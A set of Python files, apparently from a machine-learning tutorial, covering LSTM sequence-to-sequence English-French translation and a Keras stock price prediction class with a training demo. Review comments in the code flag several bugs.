    text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
    for ws in whitespace:
        text = text.replace(ws, " ")
    text = text.split()
    co = 0
    vocab_set = set(vocab)
    for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
        # convert digits to words
        # (i.e '7' to 'seven')
        if text[i].isdigit():
            text[i] = p.number_to_words(text[i])
        # compare_nouns
        # compare_adjs
        # compare_verbs
        if text[i] not in vocab_set:
            text[i] = UNK
            co += 1
    # update vocab, intersection of words
    print("vocab length:", len(vocab))
    # NOTE(review): this rebinds the module-level `vocab` (a sorted list up to
    # here) to a *set*; word2int/int2word are not rebuilt to match it.
    vocab = vocab_set & set(text)
    print("vocab length after update:", len(vocab))
    save_vocab(vocab)
    print("Number of unks:", co)
    return ' '.join(text)
from train import create_model, get_data, split_data, LSTM_UNITS, np, to_categorical, Tokenizer, pad_sequences, pickle
def tokenize(x, tokenizer=None):
    """Convert sentences to integer sequences.

    :param x: list of sentences/strings to be tokenized
    :param tokenizer: optional pre-fit tokenizer; when absent a fresh one is
        created and fit on *x*
    :return: tuple of (tokenized x data, tokenizer used to tokenize x)
    """
    if tokenizer:
        fitted = tokenizer
    else:
        fitted = Tokenizer()
        fitted.fit_on_texts(x)
    return fitted.texts_to_sequences(x), fitted
def predict_sequence(enc, dec, source, n_steps, docoder_num_tokens):
    """Generate target given source sequence, this function can be used
    after the model is trained to generate a target sequence given a source sequence."""
    # encode the source into the decoder's initial [h, c] state
    state = enc.predict(source)
    # start of sequence input: an all-zeros frame
    target_seq = np.zeros((1, 1, n_steps))
    # collect predictions
    output = []
    for t in range(n_steps):
        # predict next char
        yhat, h, c = dec.predict([target_seq] + state)
        # store predictions: greedy argmax over the output distribution
        y = yhat[0, 0, :]
        sampled_token_index = np.argmax(y)
        output.append(sampled_token_index)
        # update state
        state = [h, c]
        # update target sequence
        target_seq = np.zeros((1, 1, n_steps))
        # NOTE(review): `docoder_num_tokens` (sic) is never used, and the
        # one-hot size uses n_steps as num_classes, conflating sequence
        # length with vocabulary size — confirm against the decoder's
        # expected input dimension.
        target_seq[0, 0] = to_categorical(sampled_token_index, num_classes=n_steps)
    return np.array(output)
def logits_to_text(logits, index_to_words):
    """
    Map a sequence of predicted indices to a space-joined sentence.

    :param logits: iterable of integer predictions
    :param index_to_words: mapping from index to word
    :return: String that represents the text of the logits
    """
    words = (index_to_words[token] for token in logits)
    return ' '.join(words)
# load the data (only the sequence lengths are reused; tokenizers reloaded below)
X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
X_tk = pickle.load(open("X_tk.pickle", "rb"))
y_tk = pickle.load(open("y_tk.pickle", "rb"))
model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
model.load_weights("results/eng_fra_v1_17568.086.h5")
# interactive translation loop: read a sentence, tokenize, pad, decode
while True:
    text = input("> ")
    tokenized = np.array(tokenize([text], tokenizer=X_tk)[0])
    print(tokenized.shape)
    X = pad_sequences(tokenized, maxlen=source_sequence_length, padding="post")
    X = X.reshape((1, 1, X.shape[-1]))
    print(X.shape)
    # X = to_categorical(X, num_classes=len(X_tk.word_index) + 1)
    print(X.shape)
    sequence = predict_sequence(enc, dec, X, target_sequence_length, source_sequence_length)
    result = logits_to_text(sequence, y_tk.index_word)
    print(result)
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, LSTM, GRU, Dense, Embedding, Activation, Dropout, Sequential, RepeatVector
from tensorflow.keras.layers import TimeDistributed
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical, plot_model
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import os
import pickle
# hyper parameters
BATCH_SIZE = 32
EPOCHS = 10
# hidden units for both encoder and decoder LSTMs
LSTM_UNITS = 128
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
    """Build and compile a simple LSTM encoder-decoder translation model.

    Bug fix: the layer keyword arguments (``input_shape``,
    ``return_sequences``) were previously passed to ``Sequential.add``
    instead of the ``LSTM`` constructor, which raises a TypeError at call
    time; they now go to ``LSTM`` directly, matching the working variant of
    this function defined later in this file.
    """
    model = Sequential()
    # encoder: collapse the source sequence into a single state vector
    model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
    # repeat that vector once per output timestep for the decoder
    model.add(RepeatVector(output_sequence_length))
    # decoder: emit one hidden state per target timestep
    model.add(LSTM(LSTM_UNITS, return_sequences=True))
    model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
    model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
    return model
def create_model(num_encoder_tokens, num_decoder_tokens, latent_dim):
    """Build the seq2seq training model plus separate encoder/decoder
    inference models that share the same layers and weights.

    Returns (training_model, encoder_model, decoder_model).
    """
    # define an input sequence
    encoder_inputs = Input(shape=(None, num_encoder_tokens))
    encoder = LSTM(latent_dim, return_state=True)
    # define the encoder output
    encoder_outputs, state_h, state_c = encoder(encoder_inputs)
    encoder_states = [state_h, state_c]
    # encoder inference model
    encoder_model = Model(encoder_inputs, encoder_states)
    # set up the decoder now
    decoder_inputs = Input(shape=(None, num_decoder_tokens))
    decoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)
    decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)
    decoder_dense = Dense(num_decoder_tokens, activation="softmax")
    decoder_outputs = decoder_dense(decoder_outputs)
    # decoder inference model: states are supplied explicitly at each step
    decoder_state_input_h = Input(shape=(latent_dim,))
    decoder_state_input_c = Input(shape=(latent_dim,))
    decoder_state_inputs = [decoder_state_input_h, decoder_state_input_c]
    model = Model([encoder_inputs, decoder_inputs], decoder_outputs)
    decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_state_inputs)
    decoder_states = [state_h, state_c]
    # NOTE(review): the inference decoder output below is the raw LSTM output,
    # not passed through decoder_dense as in the training path — confirm intended.
    decoder_model = Model([decoder_inputs] + decoder_state_inputs, [decoder_outputs] + decoder_states)
    return model, encoder_model, decoder_model
def get_batches(X, y, X_tk, y_tk, source_sequence_length, target_sequence_length, batch_size=BATCH_SIZE):
    """Endlessly cycle over (X, y), yielding ([encoder_in, decoder_in], targets).

    Each batch is expanded with a singleton timestep axis, i.e. shape
    (batch, 1, seq_len), to match the model's (None, tokens) inputs.

    Bug fix: the loop previously rebound *batch_size* to the size of the
    (possibly smaller) final batch, so every epoch after the first iterated
    with the shrunken step; the requested batch size is now left intact.
    """
    while True:
        for j in range(0, len(X), batch_size):
            encoder_input_data = X[j: j + batch_size]
            decoder_input_data = y[j: j + batch_size]
            # add the singleton timestep axis the model expects
            encoder_data = np.expand_dims(encoder_input_data, axis=1)
            decoder_data = np.expand_dims(decoder_input_data, axis=1)
            yield ([encoder_data, decoder_data], decoder_input_data)
def get_data(file):
    """Load a tab-separated translation corpus and return tokenized, padded data.

    Target sentences get an ``<eos>`` marker appended before tokenization.
    :return: (X, y, X_tk, y_tk, source_sequence_length, target_sequence_length)
    """
    sources = []
    targets = []
    # loading the data; skip lines without a tab separator
    for line in open(file, encoding="utf-8"):
        if "\t" not in line:
            continue
        fields = line.strip().split("\t")
        sources.append(fields[0])
        targets.append(f"{fields[1]} <eos>")
    # tokenize data
    X_tk = Tokenizer()
    X_tk.fit_on_texts(sources)
    X = X_tk.texts_to_sequences(sources)
    y_tk = Tokenizer()
    y_tk.fit_on_texts(targets)
    y = y_tk.texts_to_sequences(targets)
    # padded widths are the longest sequence lengths on each side
    source_sequence_length = max(len(seq) for seq in X)
    target_sequence_length = max(len(seq) for seq in y)
    X = pad_sequences(X, maxlen=source_sequence_length, padding="post")
    y = pad_sequences(y, maxlen=target_sequence_length, padding="post")
    return X, y, X_tk, y_tk, source_sequence_length, target_sequence_length
def shuffle_data(X, y):
    """Shuffle X and y in place with the same permutation, preserving pairs."""
    rng_snapshot = np.random.get_state()
    np.random.shuffle(X)
    # replay the identical permutation on y
    np.random.set_state(rng_snapshot)
    np.random.shuffle(y)
    return X, y
def split_data(X, y, train_split_rate=0.2):
    """Shuffle X/y in unison and split into (X_train, y_train, X_test, y_test).

    NOTE(review): with the default 0.2, the *first* (training) slice is the
    smaller 20% — confirm that is the intended split direction.
    """
    # shuffle first
    X, y = shuffle_data(X, y)
    cut = round(len(X) * train_split_rate)
    return X[:cut], y[:cut], X[cut:], y[cut:]
if __name__ == "__main__":
    # load the data
    X, y, X_tk, y_tk, source_sequence_length, target_sequence_length = get_data("fra.txt")
    # save tokenizers for reuse by the inference script
    pickle.dump(X_tk, open("X_tk.pickle", "wb"))
    pickle.dump(y_tk, open("y_tk.pickle", "wb"))
    # shuffle & split data
    X_train, y_train, X_test, y_test = split_data(X, y)
    # construct the models
    model, enc, dec = create_model(source_sequence_length, target_sequence_length, LSTM_UNITS)
    plot_model(model, to_file="model.png")
    plot_model(enc, to_file="enc.png")
    plot_model(dec, to_file="dec.png")
    model.summary()
    model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
    if not os.path.isdir("results"):
        os.mkdir("results")
    # keep only checkpoints that improve validation loss
    checkpointer = ModelCheckpoint("results/eng_fra_v1_{val_loss:.3f}.h5", save_best_only=True, verbose=2)
    # train the model
    model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
                        validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
                        epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
                        validation_steps=(len(X_test) // BATCH_SIZE),
                        callbacks=[checkpointer])
    print("[+] Model trained.")
    model.save("results/eng_fra_v1.h5")
    print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
    """Read a tab-separated bilingual corpus; return (sources, targets) lists.

    Lines without a tab separator are skipped; only the first two
    tab-separated fields of each line are used.
    """
    sources = []
    targets = []
    # loading the data
    for line in open(file, encoding="utf-8"):
        if "\t" not in line:
            continue
        fields = line.strip().split("\t")
        sources.append(fields[0])
        targets.append(fields[1])
    return sources, targets
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
    """Assemble and compile an LSTM encoder-decoder translation model."""
    stack = [
        # encoder: collapse the source sequence into one state vector
        LSTM(LSTM_UNITS, input_shape=input_shape[1:]),
        # feed that vector to the decoder once per output timestep
        RepeatVector(output_sequence_length),
        LSTM(LSTM_UNITS, return_sequences=True),
        TimeDistributed(Dense(french_vocab_size, activation="softmax")),
    ]
    model = Sequential()
    for layer in stack:
        model.add(layer)
    model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
    return model
def tokenize(x):
    """
    Fit a fresh Tokenizer on *x* and convert it to integer sequences.

    :param x: List of sentences/strings to be tokenized
    :return: Tuple of (tokenized x data, tokenizer used to tokenize x)
    """
    tk = Tokenizer()
    tk.fit_on_texts(x)
    sequences = tk.texts_to_sequences(x)
    return sequences, tk
def pad(x, length=None):
    """
    Post-pad every sequence in *x* to *length*.

    :param x: List of sequences.
    :param length: Length to pad the sequence to. If None, use length of longest sequence in x.
    :return: Padded numpy array of sequences
    """
    return pad_sequences(x, maxlen=length, padding='post')
def preprocess(x, y):
    """
    Tokenize and pad feature/label sentence lists.

    :param x: Feature List of sentences
    :param y: Label List of sentences
    :return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
    """
    x_seqs, x_tk = tokenize(x)
    y_seqs, y_tk = tokenize(y)
    padded_x = pad(x_seqs)
    padded_y = pad(y_seqs)
    # Keras's sparse_categorical_crossentropy requires 3-D labels: add a trailing axis
    padded_y = padded_y.reshape(*padded_y.shape, 1)
    return padded_x, padded_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
    """
    Decode a 2-D logits array into a sentence via per-timestep argmax.

    :param logits: Logits from a neural network, shape (timesteps, vocab)
    :param tokenizer: Keras Tokenizer fit on the labels
    :return: String that represents the text of the logits (index 0 -> '<PAD>')
    """
    lookup = {index: word for word, index in tokenizer.word_index.items()}
    lookup[0] = '<PAD>'
    return ' '.join(lookup[token] for token in np.argmax(logits, 1))
if __name__ == "__main__":
    X, y = get_data("ara.txt")
    # corpus statistics for both sides of the parallel corpus
    english_words = [word for sentence in X for word in sentence.split()]
    french_words = [word for sentence in y for word in sentence.split()]
    english_words_counter = collections.Counter(english_words)
    french_words_counter = collections.Counter(french_words)
    print('{} English words.'.format(len(english_words)))
    print('{} unique English words.'.format(len(english_words_counter)))
    print('10 Most common words in the English dataset:')
    print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
    print()
    print('{} French words.'.format(len(french_words)))
    print('{} unique French words.'.format(len(french_words_counter)))
    print('10 Most common words in the French dataset:')
    print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
    # Tokenize Example output
    text_sentences = [
        'The quick brown fox jumps over the lazy dog .',
        'By Jove , my quick study of lexicography won a prize .',
        'This is a short sentence .']
    text_tokenized, text_tokenizer = tokenize(text_sentences)
    print(text_tokenizer.word_index)
    print()
    for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
        print('Sequence {} in x'.format(sample_i + 1))
        print('  Input:  {}'.format(sent))
        print('  Output: {}'.format(token_sent))
    # Pad Tokenized output
    test_pad = pad(text_tokenized)
    for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
        print('Sequence {} in x'.format(sample_i + 1))
        print('  Input:  {}'.format(np.array(token_sent)))
        print('  Output: {}'.format(pad_sent))
    # tokenize + pad both corpora; y gains a trailing axis for sparse CE loss
    preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
        preprocess(X, y)
    max_english_sequence_length = preproc_english_sentences.shape[1]
    max_french_sequence_length = preproc_french_sentences.shape[1]
    english_vocab_size = len(english_tokenizer.word_index)
    french_vocab_size = len(french_tokenizer.word_index)
    print('Data Preprocessed')
    print("Max English sentence length:", max_english_sequence_length)
    print("Max French sentence length:", max_french_sequence_length)
    print("English vocabulary size:", english_vocab_size)
    print("French vocabulary size:", french_vocab_size)
    # re-pad the source side to the target length so both align timestep-wise
    tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
    tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
    print("tmp_x.shape:", tmp_x.shape)
    print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
    # Train the neural network
    # increased passed index length by 1 to avoid index error
    encdec_rnn_model = create_encdec_model(
        tmp_x.shape,
        preproc_french_sentences.shape[1],
        len(english_tokenizer.word_index)+1,
        len(french_tokenizer.word_index)+1)
    print(encdec_rnn_model.summary())
    # reduced batch size
    encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
    # Print prediction(s)
    print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
    print("Original text and translation:")
    print(X[1])
    print(y[1])
    # OPTIONAL: Train and Print prediction(s)
    print("="*50)
    # Print prediction(s)
    # NOTE(review): here [0] indexes the *reshaped input* rather than the
    # prediction (compare the call above) — confirm which was intended.
    print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, ))[0]), french_tokenizer))
    print("Original text and translation:")
    print(X[10])
    print(y[10])
    # OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
    """A Class utility to train and predict price of stocks/cryptocurrencies/trades
    using keras model"""
    def __init__(self, ticker_name, **kwargs):
        """
        :param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
        :param n_steps (int): sequence length used to predict, default is 60
        :param price_column (str): the name of column that contains price predicted, default is 'adjclose'
        :param feature_columns (list): a list of feature column names used to train the model,
            default is ['adjclose', 'volume', 'open', 'high', 'low']
        :param target_column (str): target column name, default is 'future'
        :param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
        :param shuffle (bool): whether to shuffle the dataset, default is True
        :param verbose (int): verbosity level, default is 1
        ==========================================
        Model parameters
        :param n_layers (int): number of recurrent neural network layers, default is 3
        :param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
        :param units (int): number of units of cell, default is 256
        :param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
        ==========================================
        Training parameters
        :param batch_size (int): number of samples per gradient update, default is 64
        :param epochs (int): number of epochs, default is 100
        :param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
        :param loss (str, function): loss function used to minimize during training,
            default is 'mae'
        :param test_size (float): test size ratio from 0 to 1, default is 0.15
        """
        self.ticker_name = ticker_name
        # --- data parameters ---
        self.n_steps = kwargs.get("n_steps", 60)
        self.price_column = kwargs.get("price_column", 'adjclose')
        self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
        self.target_column = kwargs.get("target_column", "future")
        self.lookup_step = kwargs.get("lookup_step", 1)
        self.shuffle = kwargs.get("shuffle", True)
        self.verbose = kwargs.get("verbose", 1)
        # --- model parameters ---
        self.n_layers = kwargs.get("n_layers", 3)
        self.cell = kwargs.get("cell", LSTM)
        self.units = kwargs.get("units", 256)
        self.dropout = kwargs.get("dropout", 0.3)
        # --- training parameters ---
        self.batch_size = kwargs.get("batch_size", 64)
        self.epochs = kwargs.get("epochs", 100)
        self.optimizer = kwargs.get("optimizer", "adam")
        self.loss = kwargs.get("loss", "mae")
        self.test_size = kwargs.get("test_size", 0.15)
        # create unique model name
        self._update_model_name()
        # runtime attributes
        self.model_trained = False
        self.data_loaded = False
        self.model_created = False
        # test price values
        self.test_prices = None
        # predicted price values for the test set
        self.y_pred = None
        # prices converted to buy/sell classes
        self.classified_y_true = None
        # predicted prices converted to buy/sell classes
        self.classified_y_pred = None
        # most recent price
        self.last_price = None
        # make folders if does not exist
        if not os.path.isdir("results"):
            os.mkdir("results")
        if not os.path.isdir("logs"):
            os.mkdir("logs")
        if not os.path.isdir("data"):
            os.mkdir("data")
    def create_model(self):
        """Construct and compile the keras model"""
        # delegate to the module-level factory in utils; configuration comes
        # from the attributes set in __init__
        self.model = create_model(input_length=self.n_steps,
                                  units=self.units,
                                  cell=self.cell,
                                  dropout=self.dropout,
                                  n_layers=self.n_layers,
                                  loss=self.loss,
                                  optimizer=self.optimizer)
        self.model_created = True
        if self.verbose > 0:
            print("[+] Model created")
    def train(self, override=False):
        """Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
        If model created already trained, this method will load the weights instead of training from scratch.
        Note that this method will create the model and load data if not called before.

        :param override (bool): when True, retrain from scratch even if a saved
            weight file for this model name already exists on disk.
        """
        # if model isn't created yet, create it
        if not self.model_created:
            self.create_model()
        # if data isn't loaded yet, load it
        if not self.data_loaded:
            self.load_data()
        # if the model already exists and trained, just load the weights and return
        # but if override is True, then just skip loading weights
        if not override:
            model_name = self._model_exists()
            if model_name:
                self.model.load_weights(model_name)
                self.model_trained = True
                if self.verbose > 0:
                    print("[*] Model weights loaded")
                return
        if not os.path.isdir("results"):
            os.mkdir("results")
        if not os.path.isdir("logs"):
            os.mkdir("logs")
        model_filename = self._get_model_filename()
        # save only the best (lowest validation loss) weights seen during training
        self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
        # NOTE(review): backslash path separator is Windows-only; os.path.join
        # (or a forward slash) would be portable — confirm target platforms.
        self.tensorboard = TensorBoard(log_dir=f"logs\{self.model_name}")
        self.history = self.model.fit(self.X_train, self.y_train,
                                      batch_size=self.batch_size,
                                      epochs=self.epochs,
                                      validation_data=(self.X_test, self.y_test),
                                      callbacks=[self.checkpointer, self.tensorboard],
                                      verbose=1)
        self.model_trained = True
        if self.verbose > 0:
            print("[+] Model trained")
    def predict(self, classify=False):
        """Predicts next price for the step self.lookup_step.
        when classify is True, returns 0 for sell and 1 for buy

        :raises RuntimeError: if the model has not been trained yet.
        """
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        # reshape to fit the model input
        # NOTE(review): this swaps the two axes via reshape (which reorders
        # elements, not a transpose) — it mirrors what load_data does to the
        # training sequences, so train/inference stay consistent; verify intent.
        last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
        # expand dimension
        last_sequence = np.expand_dims(last_sequence, axis=0)
        # undo the min-max scaling on the model output to get a real price
        predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
        if classify:
            last_price = self.get_last_price()
            return 1 if last_price < predicted_price else 0
        else:
            return predicted_price
    def load_data(self):
        """Loads and preprocess data"""
        filename, exists = self._df_exists()
        if exists:
            # if the updated dataframe already exists in disk, load it
            # NOTE(review): read_csv will add the saved index as a column —
            # confirm load_data() tolerates that extra column.
            self.ticker = pd.read_csv(filename)
            ticker = self.ticker
            if self.verbose > 0:
                print("[*] Dataframe loaded from disk")
        else:
            ticker = self.ticker_name
        result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
                            shuffle=self.shuffle, feature_columns=self.feature_columns,
                            price_column=self.price_column, test_size=self.test_size)
        # extract data
        self.df = result['df']
        self.X_train = result['X_train']
        self.X_test = result['X_test']
        self.y_train = result['y_train']
        self.y_test = result['y_test']
        self.column_scaler = result['column_scaler']
        self.last_sequence = result['last_sequence']
        if self.shuffle:
            self.unshuffled_X_test = result['unshuffled_X_test']
            self.unshuffled_y_test = result['unshuffled_y_test']
        else:
            # without shuffling the test split is already in time order
            self.unshuffled_X_test = self.X_test
            self.unshuffled_y_test = self.y_test
        # undo the axis swap done in utils.load_data to recover
        # (samples, n_steps, n_features)-ordered sequences for evaluation
        self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
        self.data_loaded = True
        if self.verbose > 0:
            print("[+] Data loaded")
        # save the dataframe to disk
        self.save_data()
    def get_last_price(self):
        """Returns the last price ( i.e the most recent price )"""
        # lazily computed and cached on first access
        if not self.last_price:
            self.last_price = float(self.df[self.price_column].tail(1))
        return self.last_price
    def get_test_prices(self):
        """Returns test prices. Note that this function won't return the whole sequences,
        instead, it'll return only the last value of each sequence"""
        if self.test_prices is None:
            # last scaled price of each test sequence, mapped back to real prices
            current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
            future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
            # append the final future price so current/future align when shifted
            self.test_prices = np.array(list(current) + [future[-1]])
        return self.test_prices
    def get_y_pred(self):
        """Get predicted values of the testing set of sequences ( y_pred )

        :raises RuntimeError: if the model has not been trained yet.
        """
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        if self.y_pred is None:
            self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
        return self.y_pred
    def get_y_true(self):
        """Returns original y testing values ( y_true )"""
        test_prices = self.get_test_prices()
        # drop the first element so each entry is the price AFTER its sequence
        return test_prices[1:]
    def _get_shifted_y_true(self):
        """Returns original y testing values shifted by -1.
        This function is useful for converting to a classification problem"""
        test_prices = self.get_test_prices()
        # drop the last element so each entry is the price AT the sequence end
        return test_prices[:-1]
    def _calc_classified_prices(self):
        """Convert regression predictions to a classification predictions ( buy or sell )
        and set results to self.classified_y_pred for predictions and self.classified_y_true
        for true prices"""
        if self.classified_y_true is None or self.classified_y_pred is None:
            current_prices = self._get_shifted_y_true()
            future_prices = self.get_y_true()
            predicted_prices = self.get_y_pred()
            # classify(current, future) -> 1 when future > current (buy), else 0
            self.classified_y_true = list(map(classify, current_prices, future_prices))
            self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
    # some metrics
    def get_MAE(self):
        """Calculates the Mean-Absolute-Error metric of the test set"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        y_true = self.get_y_true()
        y_pred = self.get_y_pred()
        return mean_absolute_error(y_true, y_pred)
    def get_MSE(self):
        """Calculates the Mean-Squared-Error metric of the test set"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        y_true = self.get_y_true()
        y_pred = self.get_y_pred()
        return mean_squared_error(y_true, y_pred)
    def get_accuracy(self):
        """Calculates the accuracy after adding classification approach (buy/sell)"""
        if not self.model_trained:
            raise RuntimeError("Model is not trained yet, call model.train() first.")
        self._calc_classified_prices()
        return accuracy_score(self.classified_y_true, self.classified_y_pred)
    def plot_test_set(self):
        """Plots test data"""
        future_prices = self.get_y_true()
        predicted_prices = self.get_y_pred()
        plt.plot(future_prices, c='b')
        plt.plot(predicted_prices, c='r')
        plt.xlabel("Days")
        plt.ylabel("Price")
        plt.legend(["Actual Price", "Predicted Price"])
        plt.show()
    def save_data(self):
        """Saves the updated dataframe if it does not exist"""
        filename, exists = self._df_exists()
        if not exists:
            self.df.to_csv(filename)
            if self.verbose > 0:
                print("[+] Dataframe saved")
    def _update_model_name(self):
        # build a filesystem-safe, date-stamped name encoding the hyperparameters
        stock = self.ticker_name.replace(" ", "_")
        feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
        time_now = time.strftime("%Y-%m-%d")
        self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
    def _get_df_name(self):
        """Returns the updated dataframe name"""
        time_now = time.strftime("%Y-%m-%d")
        return f"data/{self.ticker_name}_{time_now}.csv"
    def _df_exists(self):
        """Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
        filename = self._get_df_name()
        return filename, os.path.isfile(filename)
    def _get_model_filename(self):
        """Returns the relative path of this model name with h5 extension"""
        return f"results/{self.model_name}.h5"
    def _model_exists(self):
        """Checks if model already exists in disk, returns the filename,
        returns None otherwise"""
        filename = self._get_model_filename()
        return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
# Demo: train a predictor for Apple stock and report its test metrics.
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
                    epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
                    loss="mse", shuffle=True, dropout=0.4)
# override=True: always retrain instead of loading previously saved weights
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
# classify=True returns 1 for buy, 0 for sell
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
    """Build and compile a stacked-RNN regression model.

    :param input_length: number of features per timestep (input_shape is
        (None, input_length), i.e. variable sequence length).
    :param units: number of units per recurrent cell.
    :param cell: keras recurrent layer class (e.g. LSTM, GRU).
    :param n_layers: number of recurrent layers (>= 1).
    :param dropout: dropout rate applied after every recurrent layer.
    :param loss: loss to minimize.
    :param optimizer: optimizer name or instance.
    :return: the compiled keras Sequential model.
    """
    model = Sequential()
    for i in range(n_layers):
        is_first = i == 0
        # Bug fix: the last recurrent layer must have return_sequences=False so
        # its 2-D output can feed Dense(1). The original's `if i == 0` branch
        # shadowed the last-layer branch, so n_layers == 1 produced a 3-D
        # output and a broken model.
        is_last = i == n_layers - 1
        if is_first:
            model.add(cell(units, return_sequences=not is_last, input_shape=(None, input_length)))
        elif is_last:
            model.add(cell(units, return_sequences=False))
        else:
            # middle layers keep returning full sequences
            model.add(cell(units, return_sequences=True))
        model.add(Dropout(dropout))
    # single linear output: the predicted (scaled) price
    model.add(Dense(1, activation="linear"))
    model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
    return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
              lookup_step=1, test_size=0.15, price_column='Price', feature_columns=None,
              target_column="future", buy_sell=False):
    """Loads data from yahoo finance, if the ticker is a pd Dataframe,
    it'll use it instead

    :param ticker: ticker symbol (str, downloaded via yahoo_fin) or an
